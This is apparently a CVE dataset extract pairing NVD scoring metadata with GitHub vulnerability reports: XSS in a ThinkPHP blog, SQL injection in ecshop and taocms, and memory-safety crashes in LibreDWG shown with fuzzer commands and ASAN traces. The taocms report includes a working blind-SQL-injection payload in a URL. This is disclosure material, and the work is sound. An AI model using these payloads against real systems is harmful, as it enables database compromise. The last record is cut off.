"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/baijunyao/thinkphp-bjyblog/issues/6 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"baijunyao",
"thinkphp-bjyblog"
] | Hello,
I would like to report XSS vulnerability.
In file AdminBaseController.class.php
line 20
```php
redirect(U('Admin/Login/login'));
```
In file https://github.com/baijunyao/thinkphp-bjyblog/blob/master/ThinkPHP/Mode/Api/functions.php
line 869 function U
```php
$domain = $host.(strpos($host,'.')?'':strstr($_SERVER['HTTP_HOST'],'.'));
```
function U
```php
// line 999
$url = (is_ssl()?'https://':'http://').$domain.$url;
// line 1003
return $url;
```
function redirect
```php
// line 694
$url = str_replace(array("\n", "\r"), '', $url);
// line 707
$str = "<meta http-equiv='Refresh' content='{$time};URL={$url}'>";
// line 709
exit($str);
```
exit function will terminate the script and print the message to the user which has $_SERVER['HTTP_HOST']. Then there is XSS vulnerability.
| Possible XSS vulnerability | https://api.github.com/repos/baijunyao/thinkphp-bjyblog/issues/6/comments | 3 | 2021-11-11T16:39:45Z | 2021-12-09T00:19:42Z | https://github.com/baijunyao/thinkphp-bjyblog/issues/6 | 1,051,164,245 | 6 | 2,823 |
CVE-2021-43679 | 2021-12-02T15:15:16.623 | ecshop v2.7.3 is affected by a SQL injection vulnerability in shopex\ecshop\upload\api\client\api.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/shopex/ecshop/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/shopex/ecshop/issues/4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:shopex:ecshop:2.7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "C8A07A91-6314-40DF-9918-2F99A766DE43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/shopex/ecshop/issues/4 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"shopex",
"ecshop"
] | Hello,
I would like to report for SQLI vulnerability.
## Vulnerability path
File shopex\ecshop\upload\api\client\api.php
```php
dispatch($_POST);
```
File shopex\ecshop\upload\api\client\includes\lib_api.php
```php
function dispatch($post)
{
$func_arr = array('GetDomain', 'UserLogin', 'AddCategory', 'AddBrand', 'AddGoods', 'GetCategory', 'GetBrand', 'GetGoods', 'DeleteBrand', 'DeleteCategory', 'DeleteGoods', 'EditBrand', 'EditCategory', 'EditGoods');
if(in_array($post['Action'], $func_arr) && function_exists('API_'.$post['Action']))
{
call_user_func('API_'.$post['Action'], $post);
```
File shopex\ecshop\upload\api\client\includes\lib_api.php
```php
function API_UserLogin($post)
{
$post['username'] = isset($post['UserId']) ? trim($post['UserId']) : '';
$post['password'] = isset($post['Password']) ? strtolower(trim($post['Password'])) : '';
$sql = "SELECT user_id, user_name, password, action_list, last_login".
" FROM " . $GLOBALS['ecs']->table('admin_user') .
" WHERE user_name = '" . $post['username']. "'";
$row = $GLOBALS['db']->getRow($sql);
```
File shopex\ecshop\upload\includes\cls_mysql.php
```php
function getRow($sql, $limited = false)
{
$res = $this->query($sql);
``` | Possible SQL injection vulnerability | https://api.github.com/repos/shopex/ecshop/issues/4/comments | 1 | 2021-11-11T15:27:51Z | 2021-12-05T18:42:52Z | https://github.com/shopex/ecshop/issues/4 | 1,051,096,730 | 4 | 2,824 |
CVE-2021-28236 | 2021-12-02T22:15:08.893 | LibreDWG v0.12.3 was discovered to contain a NULL pointer dereference via out_dxfb.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/324"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/324"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.3:*:*:*:*:*:*:*",
"matchCriteriaId": "EDE60CD4-CABF-4AE6-B8D1-D93460C11445",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/LibreDWG/libredwg/issues/324 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | I found four NULL dereference bugs in the current master (5d2c75f).
# Configure
CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure
# bug 1 in out_dxfb.c:1902
## Command
`./dwg2dxf -o ./fuzz_out -b -y ./poc1`
## ASAN report
```
➜ ./dwg2dxf -o ./fuzz_out -b -y ./poc1
Reading DWG file ./poc1
Warning: checksum: 0x27c51243 (calculated) mismatch
ERROR: Skip section AcDb:FileDepList with size 8 > 0 * 128
ERROR: obj_string_stream overflow, bitsize 96 => 96
ERROR: Invalid object handle 10.1.1 at pos @4.2
ERROR: bit_read_RC buffer overflow at 12
ERROR: bit_read_RC buffer overflow at 12
ERROR: bit_read_RC buffer overflow at 12
ERROR: bit_read_RC buffer overflow at 12 >= 12
ERROR: bit_read_BL: unexpected 2-bit code: '11'
ERROR: bit_read_RC buffer overflow at 12
ERROR: Invalid CMC method 0x0 ignored
ERROR: bit_advance_position buffer overflow at pos 11.7, size 12, advance by 2
ERROR: bit_read_BD buffer overflow at 12 >= 12
ERROR: Invalid BD identifier_height
Warning: check_CRC mismatch 22-38 = 16: 401C <=> 0B9D
Warning: Unstable Class object 502 TABLESTYLE (0xfff) 42/0
Warning: TODO TABLESTYLE r2010+ missing fields
Warning: Unstable Class object 503 MATERIAL (0x481) 45/0
Warning: Unstable Class object 503 MATERIAL (0x481) 46/0
Warning: Unstable Class object 503 MATERIAL (0x481) 47/0
Warning: Ignore invalid handleoff (@390)
ERROR: bit_read_RC buffer overflow at 174
ERROR: bit_read_RC buffer overflow at 171
ERROR: bit_read_RC buffer overflow at 973
ERROR: bit_read_RC buffer overflow at 284
ERROR: bit_read_RC buffer overflow at 284
ERROR: Some section size or address out of bounds
ERROR: Failed to read uncompressed Preview section
Warning: Skip empty section 0 AcDb:Template
ERROR: Template section not found
ERROR: Invalid num_segidx
Warning: Object handle not found, 2/2 in 150 objects
Warning: Object handle not found, 2/2 in 150 objects
Warning: Object handle not found, 2/2 in 150 objects
Writing DXF file ./fuzz_out as r14
ASAN:DEADLYSIGNAL
=================================================================
==17991==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7ffff4cf2b1b bp 0x7fffffffc9c0 sp 0x7fffffff8450 T0)
==17991==The signal is caused by a READ memory access.
==17991==Hint: address points to the zero page.
#0 0x7ffff4cf2b1a in dxfb_tables_write /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1902
#1 0x7ffff4d06d16 in dwg_write_dxfb /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:2312
#2 0x5555555589a1 in main /home/yuan/afl-target/libredwg-asan/programs/dwg2dxf.c:336
#3 0x7ffff1e6bbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#4 0x555555556a89 in _start (/home/yuan/afl-target/libredwg-asan/programs/.libs/dwg2dxf+0x2a89)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1902 in dxfb_tables_write
==17991==ABORTING
```
# bug 2 in out_dxfb.c:1924
## Command
`./dwg2dxf -o ./fuzz_out -b -y ./poc2`
## ASAN report
```
➜ ./dwg2dxf -o ./fuzz_out -b -y ./poc2
Reading DWG file ./poc2
Warning: checksum: 0x27c51243 (calculated) mismatch
ERROR: Skip section AcDb:FileDepList with size 8 > 0 * 128
ERROR: obj_string_stream overflow, bitsize 4294965675 => 88
ERROR: Invalid EED size 8770 > 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_read_RC buffer overflow at 11
ERROR: bit_advance_position buffer overflow at pos 10.7, size 11, advance by 2
ERROR: bit_read_BB buffer overflow at 11 >= 11
ERROR: bit_read_BD buffer overflow at 11 >= 11
ERROR: bit_read_B buffer overflow at 11 >= 11
ERROR: bit_read_BB buffer overflow at 11 >= 11
ERROR: bit_read_BD buffer overflow at 11 >= 11
ERROR: bit_read_RC buffer overflow at 11 >= 11
ERROR: bit_read_RD buffer overflow at 11 >= 11
ERROR: Invalid RD oblique_angle
Warning: check_CRC mismatch 39-54 = 15: C16F <=> 0D90
Warning: Unstable Class object 502 TABLESTYLE (0xfff) 42/0
Warning: TODO TABLESTYLE r2010+ missing fields
Warning: Unstable Class object 503 MATERIAL (0x481) 45/0
Warning: Unstable Class object 503 MATERIAL (0x481) 46/0
Warning: Unstable Class object 503 MATERIAL (0x481) 47/0
Warning: Ignore invalid handleoff (@390)
ERROR: bit_read_RC buffer overflow at 174
ERROR: bit_read_RC buffer overflow at 171
ERROR: bit_read_RC buffer overflow at 973
ERROR: bit_read_RC buffer overflow at 284
ERROR: bit_read_RC buffer overflow at 284
ERROR: Some section size or address out of bounds
ERROR: Failed to read uncompressed Preview section
Warning: Skip empty section 0 AcDb:Template
ERROR: Template section not found
ERROR: Invalid num_segidx
Warning: Object handle not found, 3/3 in 150 objects
Warning: Object handle not found, 3/3 in 150 objects
Warning: Object handle not found, 3/3 in 150 objects
Writing DXF file ./fuzz_out
ERROR: Unhandled VALUE_INT code 0
ASAN:DEADLYSIGNAL
=================================================================
==18068==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7ffff4cf4e7f bp 0x7fffffffc9e0 sp 0x7fffffff8470 T0)
==18068==The signal is caused by a READ memory access.
==18068==Hint: address points to the zero page.
#0 0x7ffff4cf4e7e in dxfb_tables_write /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1924
#1 0x7ffff4d06d16 in dwg_write_dxfb /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:2312
#2 0x5555555589a1 in main /home/yuan/afl-target/libredwg-asan/programs/dwg2dxf.c:336
#3 0x7ffff1e6bbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#4 0x555555556a89 in _start (/home/yuan/afl-target/libredwg-asan/programs/.libs/dwg2dxf+0x2a89)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1924 in dxfb_tables_write
==18068==ABORTING
```
# bug 3 in out_dxfb.c:1872
## Command
`./dwg2dxf -o ./fuzz_out -b -y poc3`
## ASAN report
```
➜ ./dwg2dxf -o ./fuzz_out -b -y poc3
Reading DWG file poc3
Warning: checksum: 0x27c51243 (calculated) mismatch
ERROR: Skip section AcDb:FileDepList with size 8 > 0 * 128
ERROR: Invalid preview size 18496. Need min. 18496 bits for TF, have 76 for RAY.
ERROR: bit_read_RC buffer overflow at 13
ERROR: bit_read_RC buffer overflow at 13
ERROR: bit_read_RC buffer overflow at 13
ERROR: bit_read_RC buffer overflow at 13
ERROR: bit_read_RC buffer overflow at 13
ERROR: bit_read_RC buffer overflow at 13
ERROR: bit_read_RC buffer overflow at 13
ERROR: bit_read_RC buffer overflow at 13
ERROR: bit_read_RC buffer overflow at 13
ERROR: bit_read_RC buffer overflow at 13
ERROR: bit_read_BD buffer overflow at 13 >= 13
ERROR: bit_read_BB buffer overflow at 13 >= 13
ERROR: bit_read_BD buffer overflow at 13 >= 13
ERROR: bit_read_BB buffer overflow at 13 >= 13
ERROR: bit_read_BD buffer overflow at 13 >= 13
ERROR: Invalid 3BD vector
Warning: check_CRC mismatch 55-71 = 16: 1ECF <=> 9AC1
Warning: Unstable Class object 502 TABLESTYLE (0xfff) 42/0
Warning: TODO TABLESTYLE r2010+ missing fields
Warning: Unstable Class object 503 MATERIAL (0x481) 45/0
Warning: Unstable Class object 503 MATERIAL (0x481) 46/0
Warning: Unstable Class object 503 MATERIAL (0x481) 47/0
Warning: Ignore invalid handleoff (@390)
ERROR: bit_read_RC buffer overflow at 174
ERROR: bit_read_RC buffer overflow at 171
ERROR: bit_read_RC buffer overflow at 973
ERROR: bit_read_RC buffer overflow at 284
ERROR: bit_read_RC buffer overflow at 284
ERROR: Some section size or address out of bounds
ERROR: Failed to read uncompressed Preview section
Warning: Skip empty section 0 AcDb:Template
ERROR: Template section not found
ERROR: Invalid num_segidx
Writing DXF file ./fuzz_out
ASAN:DEADLYSIGNAL
=================================================================
==18124==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7ffff4cf068d bp 0x7fffffffc9e0 sp 0x7fffffff8470 T0)
==18124==The signal is caused by a READ memory access.
==18124==Hint: address points to the zero page.
#0 0x7ffff4cf068c in dxfb_tables_write /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1872
#1 0x7ffff4d06d16 in dwg_write_dxfb /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:2312
#2 0x5555555589a1 in main /home/yuan/afl-target/libredwg-asan/programs/dwg2dxf.c:336
#3 0x7ffff1e6bbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#4 0x555555556a89 in _start (/home/yuan/afl-target/libredwg-asan/programs/.libs/dwg2dxf+0x2a89)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1872 in dxfb_tables_write
==18124==ABORTING
```
# bug 4 in out_dxfb.c:1944
## Command
`./dwg2dxf -o ./fuzz_out -b -y --as r12 poc4`
## ASAN report
```
➜ ./dwg2dxf -o ./fuzz_out -b -y --as r12 poc4
Reading DWG file poc4
Warning: checksum: 0x27c51243 (calculated) mismatch
ERROR: Skip section AcDb:FileDepList with size 8 > 0 * 128
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_RC buffer overflow at 6
ERROR: bit_read_BD buffer overflow at 6 >= 6
ERROR: bit_read_BB buffer overflow at 6 >= 6
ERROR: bit_read_BD buffer overflow at 6 >= 6
ERROR: bit_read_BB buffer overflow at 6 >= 6
ERROR: bit_read_BD buffer overflow at 6 >= 6
ERROR: Invalid 3BD view_target
Warning: check_CRC mismatch 73-82 = 9: 89F5 <=> 46F4
Warning: Unstable Class object 502 TABLESTYLE (0xfff) 42/0
Warning: TODO TABLESTYLE r2010+ missing fields
Warning: Unstable Class object 503 MATERIAL (0x481) 45/0
Warning: Unstable Class object 503 MATERIAL (0x481) 46/0
Warning: Unstable Class object 503 MATERIAL (0x481) 47/0
Warning: Ignore invalid handleoff (@390)
ERROR: bit_read_RC buffer overflow at 174
ERROR: bit_read_RC buffer overflow at 171
ERROR: bit_read_RC buffer overflow at 973
ERROR: bit_read_RC buffer overflow at 284
ERROR: bit_read_RC buffer overflow at 284
ERROR: Some section size or address out of bounds
ERROR: Failed to read uncompressed Preview section
Warning: Skip empty section 0 AcDb:Template
ERROR: Template section not found
ERROR: Invalid num_segidx
Writing DXF file ./fuzz_out as r12
ERROR: Unhandled VALUE_INT code 7
ASAN:DEADLYSIGNAL
=================================================================
==18183==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7ffff4cf71e3 bp 0x7fffffffc9c0 sp 0x7fffffff8450 T0)
==18183==The signal is caused by a READ memory access.
==18183==Hint: address points to the zero page.
#0 0x7ffff4cf71e2 in dxfb_tables_write /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1944
#1 0x7ffff4d06d16 in dwg_write_dxfb /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:2312
#2 0x5555555589a1 in main /home/yuan/afl-target/libredwg-asan/programs/dwg2dxf.c:336
#3 0x7ffff1e6bbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#4 0x555555556a89 in _start (/home/yuan/afl-target/libredwg-asan/programs/.libs/dwg2dxf+0x2a89)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1944 in dxfb_tables_write
==18183==ABORTING
```
# All poc
[poc.zip](https://github.com/LibreDWG/libredwg/files/6074852/poc.zip)
| Four NULL dereference in out_dxfb.c | https://api.github.com/repos/LibreDWG/libredwg/issues/324/comments | 1 | 2021-03-03T09:19:26Z | 2021-03-03T17:02:46Z | https://github.com/LibreDWG/libredwg/issues/324 | 820,916,089 | 324 | 2,825 |
CVE-2021-28237 | 2021-12-02T22:15:08.943 | LibreDWG v0.12.3 was discovered to contain a heap-buffer overflow via decode_preR13. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/325"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/325"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.3:*:*:*:*:*:*:*",
"matchCriteriaId": "EDE60CD4-CABF-4AE6-B8D1-D93460C11445",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/LibreDWG/libredwg/issues/325 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | I found a heap buffer overflow in the current master (8072563).
# Configure
CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure
# Command
`./dwgread ./poc`
# ASAN report
```
➜ ./dwgread ./poc
ERROR: This version of LibreDWG is only capable of decoding version r13-r2018 (code: AC1012-AC1032) DWG files.
We don't decode many entities and no blocks yet.
ERROR: offset -39
ERROR: offset -85
=================================================================
==12538==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6120000001c8 at pc 0x7ffff29b78be bp 0x7fffffffa8e0 sp 0x7fffffffa8d0
WRITE of size 8 at 0x6120000001c8 thread T0
#0 0x7ffff29b78bd in decode_preR13_section /home/yuan/afl-target/libredwg-asan/src/decode.c:470
#1 0x7ffff2a26e90 in decode_preR13 /home/yuan/afl-target/libredwg-asan/src/decode.c:744
#2 0x7ffff29a43e9 in dwg_decode /home/yuan/afl-target/libredwg-asan/src/decode.c:235
#3 0x7ffff297afa4 in dwg_read_file /home/yuan/afl-target/libredwg-asan/src/dwg.c:253
#4 0x5555555576f3 in main /home/yuan/afl-target/libredwg-asan/programs/dwgread.c:251
#5 0x7ffff1f52bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#6 0x5555555562a9 in _start (/home/yuan/afl-target/libredwg-asan/programs/.libs/dwgread+0x22a9)
Address 0x6120000001c8 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/yuan/afl-target/libredwg-asan/src/decode.c:470 in decode_preR13_section
Shadow bytes around the buggy address:
0x0c247fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c247fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c247fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c247fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa
=>0x0c247fff8030: fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa
0x0c247fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==12538==ABORTING
```
# POC
[poc.zip](https://github.com/LibreDWG/libredwg/files/6080842/poc.zip)
| Heap-buffer-overflow in decode_preR13 line 470 | https://api.github.com/repos/LibreDWG/libredwg/issues/325/comments | 2 | 2021-03-04T04:20:26Z | 2021-03-08T09:50:24Z | https://github.com/LibreDWG/libredwg/issues/325 | 821,736,833 | 325 | 2,826 |
CVE-2021-25783 | 2021-12-02T23:15:07.557 | Taocms v2.5Beta5 was discovered to contain a blind SQL injection vulnerability via the function Article Search. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/5"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taogogo:taocms:2.5:beta5:*:*:*:*:*:*",
"matchCriteriaId": "F6BB739F-F7D1-4F9A-A6F4-6D7AB4B05E0B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/taogogo/taocms/issues/5 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"taogogo",
"taocms"
] | First, we enter the background and use the column administrator admin1 we created:

We click in order and grab packets:


There is a SQL blind injection vulnerability in the location of name:


POC:/admin/admin.php?name=s%"+and+"sca%"="&cat=0&status=&action=cms&ctrl=lists&submit=%E6%9F%A5%E8%AF%A2
| There is SQL blind injection at "Article search"(Column administrator authority) | https://api.github.com/repos/taogogo/taocms/issues/5/comments | 1 | 2021-01-05T06:47:47Z | 2021-03-03T17:02:31Z | https://github.com/taogogo/taocms/issues/5 | 778,638,021 | 5 | 2,827 |
CVE-2021-25784 | 2021-12-02T23:15:07.600 | Taocms v2.5Beta5 was discovered to contain a blind SQL injection vulnerability via the function Edit Article. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
